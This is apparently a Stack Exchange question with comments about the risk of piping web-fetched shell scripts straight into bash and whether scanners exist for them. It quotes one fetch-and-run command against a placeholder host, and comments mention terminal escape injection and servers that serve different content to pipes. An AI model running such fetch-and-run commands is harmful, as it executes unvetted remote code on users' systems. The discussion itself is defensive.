3

It has become common trend to use shell scripts from the web and directly run them:

bash <(curl -sL some.random.website.com)

I always view the script before running them. However, shell scripts are always more cryptic than reading a regular program. And yet, they are extremely powerful. They can do so much without the user even noticing.

I have always wondered if there are any tools to verify/scan such scripts.

Also, there have been anti-viruses for decades for verifying "closed-source" code, then how come there are so few/none to verify open-source code?

Improve this question
5
  • A common trend to run bash commands like that? No wonder they say the world is going to end soon. Anyway, malware scanners don't care about open or closed source, they just check "signatures", whatever they mean by that (suspicious parts, behaviors, etc.) Commented May 5, 2020 at 14:46
  • Yes @reed. Unfortunately, it is becoming common. Github is filled with such repositories. Many mature packages are also providing installation through such methods. Commented May 5, 2020 at 14:49
  • 1
    Even if you read the script first, you are not safe: infosecmatter.com/terminal-escape-injection I have also seen studies where the server can tell the difference between just downloading a file or piping it to something, and serving different content in each case. Commented May 5, 2020 at 15:09
  • Leveraging the User as a privilege escalation is probably the most prevalent exploit since forever and likely will continue to be so. Commented May 5, 2020 at 15:16
  • 1
    I don't think there's a solution to this problem. It would be incredibly complex to write a piece of software that would read a script (or piece of code) and work out whether it had malicious intentions or stuck to doing what the devs intended -- which could involve privileged operations. You need to read and understand the code unfortunately. Commented May 5, 2020 at 16:15

0

Reset to default

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.